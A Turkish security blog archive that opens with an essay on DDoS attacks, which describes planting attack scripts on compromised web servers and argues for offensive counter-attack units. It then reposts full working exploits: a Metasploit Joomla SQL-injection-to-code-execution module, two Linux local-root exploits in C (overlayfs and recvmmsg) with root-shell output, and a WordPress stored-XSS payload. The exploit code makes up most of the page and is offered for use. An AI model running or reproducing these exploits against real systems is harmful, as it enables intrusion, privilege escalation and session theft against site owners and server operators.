Archive for Genel

DDOS SALDIRILARI

DDOS SALDIRILARI ÜZERİNE

Son bir aydır ülkemiz üzerine yapılan DDOS saldırılarına karşı güvenlik önlemlerimizin oldukça yetersiz olduğunu görmüş olduk. Geçici önlem olarak kolaycı yöntem tercih edilmiş, yurt dışı iplerine erişim kapatılmış, ” .tr” uzantısı prestij kaybına uğramıştır. Banka sistemlerine yapılan DDOS saldırıları nedeniyle internet bankacılığında sıkıntılar yaşanmıştır.kilit-security

WEB TABANLI DDOS SALDIRILARI

Hazır scriptlerin kullanım alanları oldukça yaygındır. Başta wordpress, joomla, drupal, PHPBB, vbulletin olmak üzere bir çok hazır script çok yaygın olarak kullanılmaktadır. Bu zamana kadar, bu tür scriptlerin ve eklentilerinin oldukça fazla güvenlik açıkları security sitelerinde yayınlanmış, bu açıklardan istifade edilerek sunuculara shell, ddos yazılımları, virüs, root exploitleri, rotkit vs upload edilerek, kötü niyetli kişiler tarafından amaçlarına uygun olarak kullanılmıştır, kullanılmaktadır.

Yukarıda bahsi geçen yaygın açıklar bulunduğu veya yayınlandığı anda bu güvenik açıkları taranmakta, bu açıklardan istifade edilerek, binlerce sunucunun herhangi bir dizinine ddos exploitleri veya uzaktan çağrı kodları yerleştirilmektedir.

Gerektiği taktirde, bu sunuculara bağlanılarak gerekli komutlar verilerek hedef siteye DDOS saldırıları yapılabilmektedir. web tabanlı sunuculardan yapılan saldırılar sunucu sayısıyla orantılı olarak daha etkili olabilmektedir. web sunucuları 7/24 açık olup, hat kapasitesi kişisel bilgisayarlardan çok daha yüksektir. 2011 yılında Ermeni tasarısı nedeniyle, daha başka saldırılarda da bu teknik iskorpitx kullanılmış olup, hedef siteler kısa zamanda down olmuş, daha sonra güvenlik önlemleri arttırılmış, hat kapasitelerini olağanüstü arttırmak zorunda kalmışlardır.

Sunucuya yerleştirilen zararlı yazılımlar sunucu yetkilileri veya antivirüsler tarafından farkedilip kaldırılabilir, saldırı alan hosting yetkilileri saldırıların hangi ip numarasından geldiğini farkedip, karşı sunucuya abuse bildiriminde bulunarak kaldırılmasını sağlayabilir.

Web tabanlı DDOS saldırısı, daha önceden 10 binlerce kişisel pc ye bulaştırılarak yapılan BOTNET tarzı DDOS saldırılarından mantık olarak çok farklı değildir. Binlerce web sunucusundan yapılan saldırı hat kapasitesi yönünden oldukça üstündür.

TR’de bu tür DDOS saldırıları çok fazla bilinmezken, 2004, 2005,2006 yıllarında deneme yanılma yöntemleriyle iskorpitx tarafından TR’deki hack içerikli sitelerle, illegal sitelerine yapılmış ve oldukça etkili sonuçlar alınmıştır.

Son yıllarda yazılımsal, donanımsal veya https://www.cloudflare.com/ddos/ servisleri kullanılarak DDOS saldırılarına karşı etkili önlemler alınmıştır.

DDOS saldırısının etkili olması için karşı sunucunun hat kapasitesinin üzerinde olması gerekir.

En son Nic.tr ye yapılan 40 Gbitlik saldırı boyut olarak çok yüksek boyutlu bir saldırı değildir. Dışarıdan yapılan bu tür saldırılara karşı, karşı saldırı birimleri kurulması gerekliliktir. Bazen en iyi savunma saldırıdır. Karşı savunma birimlerinin varlığı kesinlikle caydırıcı etki yaratacaktır.

Siyami Özkan

Joomla Content History SQLi Remote Code Execution

Joomla Content History Uzaktan SQL komut çalıştırma metasploit exploit joomla 3.2 3.4 açıklar bulunmaktadır

joomla

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => "Joomla Content History SQLi Remote Code Execution",
      'Description'    => %q{
        This module exploits a SQL injection vulnerability found in Joomla versions
        3.2 up to 3.4.4. The vulnerability exists in the Content History administrator
        component in the core of Joomla. Triggering the SQL injection makes it possible
        to retrieve active Super User sessions. The cookie can be used to login to the
        Joomla administrator backend. By creating a new template file containing our
        payload, remote code execution is made possible.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Asaf Orpani', # Vulnerability discovery
          'xistence <xistence[at]0x90.nl>' # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2015-7857' ], # Admin session hijacking
          [ 'CVE', '2015-7297' ], # SQLi
          [ 'CVE', '2015-7857' ], # SQLi
          [ 'CVE', '2015-7858' ], # SQLi
          [ 'URL', 'https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/' ],
          [ 'URL', 'http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html' ]
        ],
      'Payload'        =>
        {
          'DisableNops' => true,
          # Arbitrary big number. The payload gets sent as POST data, so
          # really it's unlimited
          'Space'       => 262144, # 256k
        },
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Joomla 3.x <= 3.4.4', {} ] ], 'Privileged' => false,
      'DisclosureDate' => "Oct 23 2015",
      'DefaultTarget'  => 0))
 
      register_options(
        [
          OptString.new('TARGETURI', [true, 'The base path to Joomla', '/'])
        ], self.class)
 
  end
 
  def check
 
    # Request using a non-existing table
    res = sqli(rand_text_alphanumeric(rand(10)+6))
 
    if res && res.body =~ /`(.*)_ucm_history`/
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
 
  end
 
 
  def sqli( tableprefix )
 
    # SQLi will only grab Super User sessions with a valid username and userid (else they are not logged in).
    # The extra search for NOT LIKE '%IS NOT NULL%' is because of our SQL data that's inserted in the session cookie history.
    # This way we make sure that's excluded and we only get real admin sessions.
 
    sql = " (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM #{tableprefix}session WHERE data LIKE '%Super User%' AND data NOT LIKE '%IS NOT NULL%' AND userid!='0' AND username IS NOT NULL LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)"
 
    # Retrieve cookies
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, "index.php"),
      'vars_get' => {
        'option' => 'com_contenthistory',
        'view' => 'history',
        'list[ordering]' => '',
        'item_id' => '1',
        'type_id' => '1',
        'list[select]' => sql
        }
      })
 
    return res
 
  end
 
 
  def exploit
 
    # Request using a non-existing table first, to retrieve the table prefix
    res = sqli(rand_text_alphanumeric(rand(10)+6))
 
    if res && res.code == 500 && res.body =~ /`(.*)_ucm_history`/
      table_prefix = $1
      print_status("#{peer} - Retrieved table prefix [ #{table_prefix} ]")
    else
      fail_with(Failure::Unknown, "#{peer} - Error retrieving table prefix")
    end
 
    # Retrieve the admin session using our retrieved table prefix
    res = sqli("#{table_prefix}_")
 
    if res && res.code == 500 && res.body =~ /Duplicate entry &#039;([a-z0-9]+)&#039; for key/
      auth_cookie_part = $1[0...-1]
      print_status("#{peer} - Retrieved admin cookie [ #{auth_cookie_part} ]")
    else
      fail_with(Failure::Unknown, "#{peer}: No logged-in admin user found!")
    end
 
    # Retrieve cookies
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, "administrator", "index.php")
    })
 
    if res && res.code == 200 && res.get_cookies =~ /^([a-z0-9]+)=[a-z0-9]+;/
      cookie_begin = $1
      print_status("#{peer} - Retrieved unauthenticated cookie [ #{cookie_begin} ]")
    else
      fail_with(Failure::Unknown, "#{peer} - Error retrieving unauthenticated cookie")
    end
 
    # Modify cookie to authenticated admin
    auth_cookie = cookie_begin
    auth_cookie << "="
    auth_cookie << auth_cookie_part
    auth_cookie << ";" # Authenticated session res = send_request_cgi({ 'method' => 'GET',
      'uri'      => normalize_uri(target_uri.path, "administrator", "index.php"),
      'cookie'  => auth_cookie
      })
 
    if res && res.code == 200 && res.body =~ /Administration - Control Panel/
      print_status("#{peer} - Successfully authenticated as Administrator")
    else
      fail_with(Failure::Unknown, "#{peer} - Session failure")
    end
 
 
    # Retrieve template view
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, "administrator", "index.php"),
      'cookie'  => auth_cookie,
      'vars_get' => {
        'option' => 'com_templates',
        'view' => 'templates'
        }
      })
 
    # We try to retrieve and store the first template found
    if res && res.code == 200 && res.body =~ /\/administrator\/index.php\?option=com_templates&view=template&id=([0-9]+)&file=([a-zA-Z0-9=]+)/
      template_id = $1
      file_id = $2
    else
      fail_with(Failure::Unknown, "Unable to retrieve template")
    end
 
    filename = rand_text_alphanumeric(rand(10)+6)
 
    # Create file
    print_status("#{peer} - Creating file [ #{filename}.php ]")
    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, "administrator", "index.php"),
      'cookie'  => auth_cookie,
      'vars_get' => {
        'option' => 'com_templates',
        'task' => 'template.createFile',
        'id' => template_id,
        'file' => file_id,
        },
      'vars_post' => {
        'type' => 'php',
        'name' => filename
      }
      })
 
    # Grab token
    if res && res.code == 303 && res.headers['Location']
      location = res.headers['Location']
      print_status("#{peer} - Following redirect to [ #{location} ]")
      res = send_request_cgi(
        'uri'    => location,
        'method' => 'GET',
        'cookie' => auth_cookie
      )
 
      # Retrieving template token
      if res && res.code == 200 && res.body =~ /&([a-z0-9]+)=1\">/
        token = $1
        print_status("#{peer} - Token [ #{token} ] retrieved")
      else
        fail_with(Failure::Unknown, "#{peer} - Retrieving token failed")
      end
 
      if res && res.code == 200 && res.body =~ /(\/templates\/.*\/)template_preview.png/
        template_path = $1
        print_status("#{peer} - Template path [ #{template_path} ] retrieved")
      else
        fail_with(Failure::Unknown, "#{peer} - Unable to retrieve template path")
      end
 
    else
      fail_with(Failure::Unknown, "#{peer} - Creating file failed")
    end
 
    filename_base64 = Rex::Text.encode_base64("/#{filename}.php")
 
    # Inject payload data into file
    print_status("#{peer} - Insert payload into file [ #{filename}.php ]")
    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, "administrator", "index.php"),
      'cookie'  => auth_cookie,
      'vars_get' => {
        'option' => 'com_templates',
        'view' => 'template',
        'id' => template_id,
        'file' => filename_base64,
        },
      'vars_post' => {
        'jform' => payload.encoded,
        'task' => 'template.apply',
        token => '1',
        'jform[extension_id]' => template_id,
        'jform[filename]' => "/#{filename}.php"
      }
      })
 
    if res && res.code == 303 && res.headers['Location'] =~ /\/administrator\/index.php\?option=com_templates&view=template&id=#{template_id}&file=/
      print_status("#{peer} - Payload data inserted into [ #{filename}.php ]")
    else
      fail_with(Failure::Unknown, "#{peer} - Could not insert payload into file [ #{filename}.php ]")
    end
 
    # Request payload
    register_files_for_cleanup("#{filename}.php")
    print_status("#{peer} - Executing payload")
    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, template_path, "#{filename}.php"),
      'cookie'  => auth_cookie
    })
 
  end
 
end

Ubuntu 12.04, 14.04, 14.10, 15.04 – overlayfs Local Root (Shell)

Ubuntu 12.04, 14.04, 14.10, 15.04 – overlayfs Local Root (Shell) açığına ilişkin kodlar yer alıyor.

/*
# Exploit Title: ofs.c - overlayfs local root in ubuntu
# Date: 2015-06-15
# Exploit Author: rebel
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
# CVE : CVE-2015-1328     (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)
 
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
CVE-2015-1328 / ofs.c
overlayfs incorrect permission handling + FS_USERNS_MOUNT
 
user-server-1504:~$ uname -a
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
user-server-1504:~$ gcc ofs.c -o ofs
user-server-1504:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
user-server-1504:~$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)
 
greets to beist & kaliman
2015-05-24
%rebel%
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
*/
 
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <signal.h>
#include <fcntl.h>
#include <string.h>
#include <linux/sched.h>
 
#define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n    return _real_getuid();\n}\n"
 
static char child_stack[1024*1024];
 
static int
child_exec(void *stuff)
{
    char *file;
    system("rm -rf /tmp/ns_sploit");
    mkdir("/tmp/ns_sploit", 0777);
    mkdir("/tmp/ns_sploit/work", 0777);
    mkdir("/tmp/ns_sploit/upper",0777);
    mkdir("/tmp/ns_sploit/o",0777);
 
    fprintf(stderr,"mount #1\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
            fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
            exit(-1);
        }
        file = ".access";
        chmod("/tmp/ns_sploit/work/work",0777);
    } else file = "ns_last_pid";
 
    chdir("/tmp/ns_sploit/o");
    rename(file,"ld.so.preload");
 
    chdir("/");
    umount("/tmp/ns_sploit/o");
    fprintf(stderr,"mount #2\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
            exit(-1);
        }
        chmod("/tmp/ns_sploit/work/work",0777);
    }
 
    chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
    umount("/tmp/ns_sploit/o");
}
 
int
main(int argc, char **argv)
{
    int status, fd, lib;
    pid_t wrapper, init;
    int clone_flags = CLONE_NEWNS | SIGCHLD;
 
    fprintf(stderr,"spawning threads\n");
 
    if((wrapper = fork()) == 0) {
        if(unshare(CLONE_NEWUSER) != 0)
            fprintf(stderr, "failed to create new user namespace\n");
 
        if((init = fork()) == 0) {
            pid_t pid =
                clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
            if(pid < 0) {
                fprintf(stderr, "failed to create new mount namespace\n");
                exit(-1);
            }
 
            waitpid(pid, &status, 0);
 
        }
 
        waitpid(init, &status, 0);
        return 0;
    }
 
    usleep(300000);
 
    wait(NULL);
 
    fprintf(stderr,"child threads done\n");
 
    fd = open("/etc/ld.so.preload",O_WRONLY);
 
    if(fd == -1) {
        fprintf(stderr,"exploit failed\n");
        exit(-1);
    }
 
    fprintf(stderr,"/etc/ld.so.preload created\n");
    fprintf(stderr,"creating shared library\n");
    lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
    write(lib,LIB,strlen(LIB));
    close(lib);
    lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
    if(lib != 0) {
        fprintf(stderr,"couldn't create dynamic library\n");
        exit(-1);
    }
    write(fd,"/tmp/ofs-lib.so\n",16);
    close(fd);
    system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
    execl("/bin/su","su",NULL);
}

Ubuntu Local Root Exploit

ubuntu-root2

linux 3.4+ local root (CONFIG_X86_X32=y) ubuntu exploitiyle uzaktan root yetkisi alınabilmektedir. Açığı ilişkin derlenmemiş exploit aşağıdadır.

/*
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
recvmmsg.c - linux 3.4+ local root (CONFIG_X86_X32=y)
CVE-2014-0038 / x32 ABI with recvmmsg
by 
-----------------------------------

takes about 13 minutes to run because timeout->tv_sec is decremented
once per second and 0xff*3 is 765.

some things you could do while waiting:
  * watch ?v=OPyZGCKu2wg 3 times
  * read https://wiki.ubuntu.com/Security/Features and smirk a few times
  * brew some coffee
  * stare at the countdown giggly with anticipation

could probably whack the high bits of some pointer with nanoseconds,
but that would require a bunch of nulls before the pointer and then
reading an oops from dmesg which isn't that elegant.

&net_sysctl_root.permissions is nice because it has 16 trailing nullbytes

hardcoded offsets because I only saw this on ubuntu & kallsyms is protected
anyway..

same principle will work on 32bit but I didn't really find any major
distros shipping with CONFIG_X86_X32=y

user:~$ uname -a
Linux ubuntu 3.11.0-15-generic #23-Ubuntu SMP Mon Dec 9 18:17:04 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
user:~$ gcc recvmmsg.c -o recvmmsg
user:~$ ./recvmmsg
byte 3 / 3.. ~0 secs left.
w00p w00p!
# id
uid=0(root) gid=0(root) groups=0(root)
# sh phalanx-2.6b-x86_64.sh
unpacking..

:)=

greets to my homeboys kaliman, beist, capsl & all of #social

Sat Feb  1 22:15:19 CET 2014
% rebel %
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
*/

#define _GNU_SOURCE
#include <netinet/ip.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/utsname.h>

#define __X32_SYSCALL_BIT 0x40000000
#undef __NR_recvmmsg
#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)
#define VLEN 1
#define BUFSIZE 200

int port;

struct offset {
    char *kernel_version;
    unsigned long dest; // net_sysctl_root + 96
    unsigned long original_value; // net_ctl_permissions
    unsigned long prepare_kernel_cred;
    unsigned long commit_creds;
};

struct offset offsets[] = {
    {"3.11.0-15-generic",0xffffffff81cdf400+96,0xffffffff816d4ff0,0xffffffff8108afb0,0xffffffff8108ace0}, // Ubuntu 13.10
    {"3.11.0-12-generic",0xffffffff81cdf3a0,0xffffffff816d32a0,0xffffffff8108b010,0xffffffff8108ad40}, // Ubuntu 13.10
    {"3.8.0-19-generic",0xffffffff81cc7940,0xffffffff816a7f40,0xffffffff810847c0, 0xffffffff81084500}, // Ubuntu 13.04
    {NULL,0,0,0,0}
};

void udp(int b) {
    int sockfd;
    struct sockaddr_in servaddr,cliaddr;
    int s = 0xff+1;

    if(fork() == 0) {
        while(s > 0) {
            fprintf(stderr,"\rbyte %d / 3.. ~%d secs left    \b\b\b\b",b+1,3*0xff - b*0xff - (0xff+1-s));
            sleep(1);
            s--;
            fprintf(stderr,".");
        }

        sockfd = socket(AF_INET,SOCK_DGRAM,0);
        bzero(&servaddr,sizeof(servaddr));
        servaddr.sin_family = AF_INET;
        servaddr.sin_addr.s_addr=htonl(INADDR_LOOPBACK);
        servaddr.sin_port=htons(port);
        sendto(sockfd,"1",1,0,(struct sockaddr *)&servaddr,sizeof(servaddr));
        exit(0);
    }

}

void trigger() {
    open("/proc/sys/net/core/somaxconn",O_RDONLY);

    if(getuid() != 0) {
        fprintf(stderr,"not root, ya blew it!\n");
        exit(-1);
    }

    fprintf(stderr,"w00p w00p!\n");
    system("/bin/sh -i");
}

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

// thx bliss
static int __attribute__((regparm(3)))
getroot(void *head, void * table)
{
    commit_creds(prepare_kernel_cred(0));
    return -1;
}

void __attribute__((regparm(3)))
trampoline()
{
    asm("mov $getroot, %rax; call *%rax;");
}

int main(void)
{
    int sockfd, retval, i;
    struct sockaddr_in sa;
    struct mmsghdr msgs[VLEN];
    struct iovec iovecs[VLEN];
    char buf[BUFSIZE];
    long mmapped;
    struct utsname u;
    struct offset *off = NULL;

    uname(&u);

    for(i=0;offsets[i].kernel_version != NULL;i++) {
        if(!strcmp(offsets[i].kernel_version,u.release)) {
            off = &offsets[i];
            break;
        }
    }

    if(!off) {
        fprintf(stderr,"no offsets for this kernel version..\n");
        exit(-1);
    }

    mmapped = (off->original_value  & ~(sysconf(_SC_PAGE_SIZE) - 1));
    mmapped &= 0x000000ffffffffff;

        srand(time(NULL));
    port = (rand() % 30000)+1500;

    commit_creds = (_commit_creds)off->commit_creds;
    prepare_kernel_cred = (_prepare_kernel_cred)off->prepare_kernel_cred;

    mmapped = (long)mmap((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);

    if(mmapped == -1) {
        perror("mmap()");
        exit(-1);
    }

    memset((char *)mmapped,0x90,sysconf(_SC_PAGE_SIZE)*3);

    memcpy((char *)mmapped + sysconf(_SC_PAGE_SIZE), (char *)&trampoline, 300);

    if(mprotect((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_EXEC) != 0) {
        perror("mprotect()");
        exit(-1);
    }

    sockfd = socket(AF_INET, SOCK_DGRAM, 0);
    if (sockfd == -1) {
        perror("socket()");
        exit(-1);
    }

    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    sa.sin_port = htons(port);

    if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
        perror("bind()");
        exit(-1);
    }

    memset(msgs, 0, sizeof(msgs));

    iovecs[0].iov_base = &buf;
    iovecs[0].iov_len = BUFSIZE;
    msgs[0].msg_hdr.msg_iov = &iovecs[0];
    msgs[0].msg_hdr.msg_iovlen = 1;

    for(i=0;i < 3 ;i++) {
        udp(i);
        retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)off->dest+7-i);
        if(!retval) {
            fprintf(stderr,"\nrecvmmsg() failed\n");
        }
    }

    close(sockfd);

    fprintf(stderr,"\n");

    trigger();
}

WordPress Quick Contact Form Plugin 6.0 – Persistent XSS

wordpress-vulnerability

WordPress Quick Contact Form Plugin 6.0 – Persistent XSS açığı bulunmuş olup açığın oluşum yerliri ve kullanımı hakkında açıklamalar aşağıdaki gibidir.

===============================================================================
|                                                                             |
                         ____                     _ __
              ___  __ __/ / /__ ___ ______ ______(_) /___ __
             / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // /
            /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, /
                                                     /___/ team

                          PUBLIC SECURITY ADVISORY
|                                                                             |
===============================================================================

TITLE
=====

Quick Contact Form - Persistent Cross Site Scripting Vulnerability

AUTHOR
======

Zy0d0x

DATE
====

10/06/2013

VENDOR
======

Quick Plugins - http://quick-plugins.com/

AFFECTED PRODUCT
================

Quick Contact Form  WordPress Plugin Version 6.0 possibly earlier

VULNERABILITY CLASS
===================

Cross-Site Scripting

DESCRIPTION
===========

Quick Contact Form suffers from a persistent Cross-Site Scripting vulnerability due to a lack
of input validation and output sanitization of the qcfname4 paramater.
Other input fields are also effective to reflective cross site scripting.

PROOF OF CONCEPT
================

Enter the following into the field where Quick Contact Form requests a Message.

--- SNIP ---

"><script>alert(String.fromCharCode(90,121,48,100,48,120))</script><

--- SNIP ---

If the message has been sent successfully a alert diolog will apear containing Zy0d0x when an user checks there message in the dashboard.

IMPACT
======

An attacker could potentially hijack session authentication tokes of remote users and leverage the
vulnerability to increase the attack vector to the underlying software and operating system of the victim.

THREAT LEVEL
============

High

STATUS
======

Fixed update to version 6.1

DISCLAIMER
==========

nullsecurity.net hereby emphasize, that the information which is published here are
for education purposes only. nullsecurity.net does not take any responsibility for
any abuse or misusage!